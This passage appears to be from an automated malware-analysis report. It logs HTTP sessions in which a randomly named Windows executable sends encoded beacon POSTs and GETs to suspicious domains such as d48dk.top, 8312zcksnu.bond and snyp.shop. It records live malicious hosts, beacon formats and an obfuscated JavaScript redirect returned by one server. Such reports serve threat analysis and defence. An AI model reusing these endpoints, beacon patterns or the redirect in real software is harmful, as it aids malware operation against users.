                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 219
                                                      Referer: http://www.d48dk.top/9ffw/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 4a 63 30 6c 4e 53 4f 49 4c 5a 62 6c 7a 6b 49 2f 57 46 46 33 4d 45 6e 78 63 57 73 49 54 58 61 73 75 68 4a 36 68 4e 4f 57 71 61 36 50 6f 50 49 6d 72 71 49 72 32 70 4d 51 51 74 56 49 43 59 76 30 42 77 38 55 2f 78 68 62 32 6d 49 75 5a 48 73 65 77 6e 75 36 74 6e 31 61 68 69 75 63 52 2b 32 50 51 66 63 4e 69 65 53 2f 31 51 2b 30 75 32 62 38 47 39 6b 6a 43 4b 73 78 33 67 6c 55 77 79 56 50 74 64 6f 54 75 72 62 67 41 56 55 31 58 75 79 38 61 57 34 5a 38 75 6c 77 66 6a 30 4d 4f 5a 48 6a 6e 31 39 35 4c 78 65 68 6c 49 47 63 57 2b 4d 55 4b 37 79 45 70 35 4a 75 41 2b 4a 73 37 4a 78 6a 4a 55 4c 48 51 3d 3d
                                                      Data Ascii: 66Sxjp=gCyAac3FM9KhZJc0lNSOILZblzkI/WFF3MEnxcWsITXasuhJ6hNOWqa6PoPImrqIr2pMQQtVICYv0Bw8U/xhb2mIuZHsewnu6tn1ahiucR+2PQfcNieS/1Q+0u2b8G9kjCKsx3glUwyVPtdoTurbgAVU1Xuy8aW4Z8ulwfj0MOZHjn195LxehlIGcW+MUK7yEp5JuA+Js7JxjJULHQ==
                                                       Dec 10, 2024 18:00:28.216721058 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:27 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66927002-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       3 | 192.168.2.7 | 49863 | 154.23.184.207 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 10, 2024 18:00:29.339118958 CET | 803 | OUT | POST /9ffw/ HTTP/1.1
                                                      Host: www.d48dk.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.d48dk.top
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 239
                                                      Referer: http://www.d48dk.top/9ffw/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 6a 61 73 4d 70 4a 35 6c 52 4f 52 71 61 36 48 49 50 42 72 4c 71 48 72 32 6c 45 51 55 74 56 49 47 49 76 30 44 6f 38 56 4f 78 6d 62 6d 6d 57 68 35 47 4b 54 51 6e 75 36 74 6e 31 61 68 32 45 63 52 32 32 4f 68 76 63 4d 44 65 4e 68 6c 51 2f 33 75 32 62 76 57 39 67 6a 43 4c 4a 78 79 49 62 55 79 4b 56 50 70 5a 6f 51 2f 72 45 35 51 56 53 72 6e 76 45 33 50 6e 58 51 65 2b 69 33 74 7a 38 43 4d 70 39 6d 52 30 66 6a 70 39 79 2f 30 77 39 59 55 61 36 44 73 6d 48 47 6f 39 52 6a 69 4b 6f 7a 4d 73 62 75 62 31 50 52 70 35 35 35 69 45 36 6c 55 59 6d 55 5a 2b 46 2b 48 45 31 67 34 30 3d
                                                      Data Ascii: 66Sxjp=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8IhjasMpJ5lRORqa6HIPBrLqHr2lEQUtVIGIv0Do8VOxmbmmWh5GKTQnu6tn1ah2EcR22OhvcMDeNhlQ/3u2bvW9gjCLJxyIbUyKVPpZoQ/rE5QVSrnvE3PnXQe+i3tz8CMp9mR0fjp9y/0w9YUa6DsmHGo9RjiKozMsbub1PRp555iE6lUYmUZ+F+HE1g40=


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.7 | 49870 | 154.23.184.207 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:00:32.005245924 CET | 1816 | OUT | POST /9ffw/ HTTP/1.1
                                                      Host: www.d48dk.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.d48dk.top
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1251
                                                      Referer: http://www.d48dk.top/9ffw/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 37 61 73 2b 52 4a 36 45 52 4f 51 71 61 36 4e 6f 50 4d 72 4c 71 67 72 31 56 2b 51 55 70 76 49 45 41 76 31 6d 30 38 53 38 56 6d 52 6d 6d 57 35 4a 47 65 65 77 6e 37 36 74 33 78 61 68 6d 45 63 52 32 32 4f 6a 33 63 46 79 65 4e 6d 56 51 2b 30 75 32 50 38 47 38 48 6a 43 6a 7a 78 79 4e 67 58 44 71 56 50 4a 4a 6f 63 74 44 45 6d 41 56 51 71 6e 76 4d 33 50 6a 49 51 65 53 59 33 73 47 68 43 4d 42 39 6d 56 51 41 6b 4c 31 66 74 43 5a 69 55 30 36 6c 4a 36 79 76 4b 72 31 4b 6e 53 4c 4a 39 37 64 6d 67 71 49 41 46 4d 51 66 70 52 4d 74 69 48 6f 58 62 63 54 64 74 58 55 2b 35 2b 51 37 4a 41 65 33 71 78 32 74 56 4c 66 32 6c 33 45 50 35 63 62 75 6f 5a 39 67 36 68 59 59 67 65 4f 58 6c 70 61 59 6c 30 7a 57 65 63 6a 35 50 32 31 51 4c 65 45 6a 42 6f 71 69 57 71 74 6e 46 4b 64 78 63 42 36 65 74 6a 79 38 2b 6b 70 36 39 38 46 74 38 73 4b 43 6f 76 48 74 7a 43 57 6f 5a 33 49 36 49 6d 79 [TRUNCATED]
                                                      Data Ascii: 66Sxjp=[TRUNCATED]
                                                      Dec 10, 2024 18:00:33.549079895 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66927002-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.7 | 49876 | 154.23.184.207 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:00:34.669547081 CET | 532 | OUT | GET /9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNE HTTP/1.1
                                                      Host: www.d48dk.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Dec 10, 2024 18:00:36.220484018 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66927002-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.7 | 49896 | 38.165.29.234 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:00:42.177238941 CET | 801 | OUT | POST /d3gs/ HTTP/1.1
                                                      Host: www.8312zcksnu.bond
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.8312zcksnu.bond
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 219
                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 67 53 65 74 6e 4c 61 67 4f 78 5a 70 2f 32 6b 66 6d 59 49 37 52 6f 6d 74 43 38 4f 32 63 72 45 78 50 67 72 58 58 71 47 32 72 74 37 6e 39 68 5a 6f 47 74 76 50 72 64 44 62 56 38 7a 35 41 4d 58 69 6f 36 50 64 34 61 49 66 45 34 46 4c 61 53 56 4f 70 33 6f 68 47 31 4f 47 77 47 41 57 6d 42 45 55 46 4a 32 57 75 6b 6f 57 6c 32 33 63 6f 76 6e 72 44 35 6c 65 52 39 71 4e 45 4e 38 64 48 37 2f 73 6f 68 5a 33 78 62 74 39 51 2b 39 6a 37 62 4c 75 37 49 42 6c 65 55 53 56 71 77 72 65 39 41 4b 33 53 78 43 6b 53 53 6a 53 2b 59 64 32 77 45 65 32 34 55 43 5a 65 35 4f 73 34 48 79 73 50 57 2b 74 63 69 4a 77 65 67 3d 3d
                                                      Data Ascii: 66Sxjp=pni45pvYJcfAgSetnLagOxZp/2kfmYI7RomtC8O2crExPgrXXqG2rt7n9hZoGtvPrdDbV8z5AMXio6Pd4aIfE4FLaSVOp3ohG1OGwGAWmBEUFJ2WukoWl23covnrD5leR9qNEN8dH7/sohZ3xbt9Q+9j7bLu7IBleUSVqwre9AK3SxCkSSjS+Yd2wEe24UCZe5Os4HysPW+tciJweg==


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.7 | 49902 | 38.165.29.234 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:00:44.844358921 CET | 821 | OUT | POST /d3gs/ HTTP/1.1
                                                      Host: www.8312zcksnu.bond
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.8312zcksnu.bond
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 239
                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 67 78 4f 41 62 58 57 76 6d 32 73 74 37 6e 7a 42 5a 70 43 74 76 51 72 64 50 70 56 2b 6e 35 41 4d 72 69 6f 34 58 64 34 70 51 63 57 59 46 4a 53 79 56 51 6a 58 6f 68 47 31 4f 47 77 47 55 76 6d 48 73 55 46 36 75 57 30 47 4d 4a 2b 57 33 66 76 76 6e 72 48 35 6c 61 52 39 72 59 45 50 49 33 48 35 48 73 6f 6c 64 33 78 71 74 2b 66 2b 39 6c 6c 72 4c 39 38 35 6b 54 58 6b 4f 32 31 6d 6a 41 33 33 43 79 65 6e 44 47 49 77 76 2b 67 4a 6c 4e 30 47 36 41 76 79 66 73 63 34 4b 30 31 6c 47 4e 51 68 62 48 52 77 6f 30 49 66 56 4f 61 41 6f 6d 6b 67 51 65 79 42 6e 70 5a 64 69 6f 52 5a 38 3d
                                                      Data Ascii: 66Sxjp=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYgxOAbXWvm2st7nzBZpCtvQrdPpV+n5AMrio4Xd4pQcWYFJSyVQjXohG1OGwGUvmHsUF6uW0GMJ+W3fvvnrH5laR9rYEPI3H5Hsold3xqt+f+9llrL985kTXkO21mjA33CyenDGIwv+gJlN0G6Avyfsc4K01lGNQhbHRwo0IfVOaAomkgQeyBnpZdioRZ8=


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.7 | 49908 | 38.165.29.234 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:00:47.517285109 CET | 1834 | OUT | POST /d3gs/ HTTP/1.1
                                                      Host: www.8312zcksnu.bond
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.8312zcksnu.bond
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1251
                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 6f 78 50 79 54 58 57 4a 75 32 74 74 37 6e 73 78 5a 6b 43 74 76 64 72 64 6e 74 56 2b 72 70 41 4a 76 69 70 62 66 64 76 4d 6b 63 64 59 46 4a 65 53 56 52 70 33 6f 34 47 31 65 43 77 47 45 76 6d 48 73 55 46 39 57 57 36 45 6f 4a 38 57 33 63 6f 76 6e 6e 44 35 6c 32 52 39 6a 49 45 50 4d 4e 48 6f 6e 73 72 46 4e 33 32 49 46 2b 53 2b 39 6e 6b 72 4b 67 38 35 59 41 58 6b 43 36 31 6d 2f 2b 33 77 47 79 62 57 61 4d 53 53 66 70 39 35 45 58 33 46 69 54 70 52 7a 47 46 4a 61 6a 32 32 65 57 53 54 44 47 4a 32 41 62 4c 36 4d 7a 4c 7a 30 46 6f 43 63 32 31 6b 36 68 62 73 33 73 41 59 76 71 6d 58 42 79 42 44 76 34 64 4d 61 5a 56 54 42 36 37 6a 6a 39 79 58 4f 55 4f 6e 31 45 77 37 67 64 6b 54 61 33 48 37 54 2f 6d 48 66 74 2b 6b 75 59 34 51 70 2f 34 69 59 31 69 4e 4c 69 47 42 46 65 6a 36 56 33 34 6e 48 2b 6c 62 67 6f 56 41 6d 4b 4e 6d 54 4d 46 39 68 69 6f 61 65 45 36 6c 79 6a 79 4a 4e [TRUNCATED]
                                                      Data Ascii: 66Sxjp=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYoxPyTXWJu2tt7nsxZkCtvdrdntV+rpAJvipbfdvMkcdYFJeSVRp3o4G1eCwGEvmHsUF9WW6EoJ8W3covnnD5l2R9jIEPMNHonsrFN32IF+S+9nkrKg85YAXkC61m/+3wGybWaMSSfp95EX3FiTpRzGFJaj22eWSTDGJ2AbL6MzLz0FoCc21k6hbs3sAYvqmXByBDv4dMaZVTB67jj9yXOUOn1Ew7gdkTa3H7T/mHft+kuY4Qp/4iY1iNLiGBFej6V34nH+lbgoVAmKNmTMF9hioaeE6lyjyJN6VWOdTWnlFOpEYWt+L/b9PeQKW45ib64oeSx9AhP+nNQkUf5rHAJz2iRK+raVsszc7xmAvpdTfRrwuEDKHPYJ+Gv1O/mxqIR+q6xqeFgU7oo7zUcIR73oGE4Y2wkAQEt22OgaW0g0qiMlyhsriPzQuY3tjX/8FMJKxshiNeyobbvHyP/zdNRfSsLF5uWNPdopyOuV2c2vZFXaWIKoX7BghSdQzZyfAHv4sO00OB6ttMF60q0o5zUq5pR6icQYwZNxWpMl06R1qy04AJBfl6Jz0b0MCYWPxhFR/bIlV40Kz7jhhldjygDTEPgUPd59vBnln5V5/b8E9cZ0uSBE4Yjt2qLbCai2oyXa2K5mvVSkkqHKA9OxnF/O3JpUMMCtDD7sXGx/w2KdWjd9Q9erBh3csMDKIOi/eRGBep7yUEaOxjGPIMPZcQ2pRbS7ig2JqO+lrHlD+Q3grFr2llkkn1AChKCMV64CLsyUWJlIQDxDmT4hJUXJqMS6iX8lMCvcVT5CGm7ptH+eEIt1ozbNplD1vnpcM5mNq3ThVx/GUWuASMwCOmqrux+7OkFtRWbuXhrgctO9pwyuMSKtbNGzO3EQzqtyBqQ1DIZjaL++W8MqMJdF79dhPHNrVwNKJD9TIZSmcXBEt1ZyRJTKPGamPM+SAQoS9NfXzmTu6 [TRUNCATED]


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.7 | 49913 | 38.165.29.234 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:00:50.358683109 CET | 538 | OUT | GET /d3gs/?66Sxjp=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&PNE=e0RPRf4HVNE HTTP/1.1
                                                      Host: www.8312zcksnu.bond
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Dec 10, 2024 18:00:52.084012032 CET | 855 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:51 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Raw: 32 39 36 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 37 34 61 39 61 63 65 62 37 63 61 63 32 35 64 61 66 61 37 61 30 62 31 35 63 64 38 62 35 63 39 64 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 31 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 [TRUNCATED]
                                                      Data Ascii: 296<script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script> var url = "https://test-demo.eekxp.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(function() { window[_0x0[0]][_0x0[1]] = url; }, 0);</script>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.7 | 49932 | 13.248.169.48 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:00:57.765922070 CET | 783 | OUT | POST /4nyz/ HTTP/1.1
                                                      Host: www.snyp.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.snyp.shop
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 219
                                                      Referer: http://www.snyp.shop/4nyz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 4e 52 6f 68 66 4b 6a 7a 77 59 44 47 6d 6c 46 78 72 7a 43 30 62 73 69 4b 31 4c 35 4d 72 4e 63 51 6a 53 67 54 51 4a 58 44 41 6f 79 51 34 35 67 2b 48 52 55 65 4b 36 38 6e 4d 79 4b 4a 49 65 4e 57 48 48 31 71 63 53 6c 59 66 6e 38 62 6c 50 33 4e 45 70 51 52 37 44 55 65 62 78 48 43 57 4a 48 76 61 49 35 32 39 2f 67 6c 41 2b 32 34 78 48 5a 44 70 4b 33 71 55 53 39 79 56 63 46 58 37 7a 42 4b 6f 2b 76 6f 32 58 44 6a 36 39 69 41 69 63 2f 6d 47 73 53 51 67 56 31 58 50 48 74 6e 62 48 5a 49 69 31 71 33 78 39 68 55 6a 38 73 34 35 67 6f 64 39 43 5a 64 36 6f 62 50 69 6b 58 69 66 33 70 4c 47 4d 54 78 31 67 3d 3d
                                                      Data Ascii: 66Sxjp=WekfKnjJCwpVNRohfKjzwYDGmlFxrzC0bsiK1L5MrNcQjSgTQJXDAoyQ45g+HRUeK68nMyKJIeNWHH1qcSlYfn8blP3NEpQR7DUebxHCWJHvaI529/glA+24xHZDpK3qUS9yVcFX7zBKo+vo2XDj69iAic/mGsSQgV1XPHtnbHZIi1q3x9hUj8s45god9CZd6obPikXif3pLGMTx1g==
                                                      Dec 10, 2024 18:00:58.856128931 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.7 | 49938 | 13.248.169.48 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:01:00.422977924 CET | 803 | OUT | POST /4nyz/ HTTP/1.1
                                                      Host: www.snyp.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.snyp.shop
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 239
                                                      Referer: http://www.snyp.shop/4nyz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
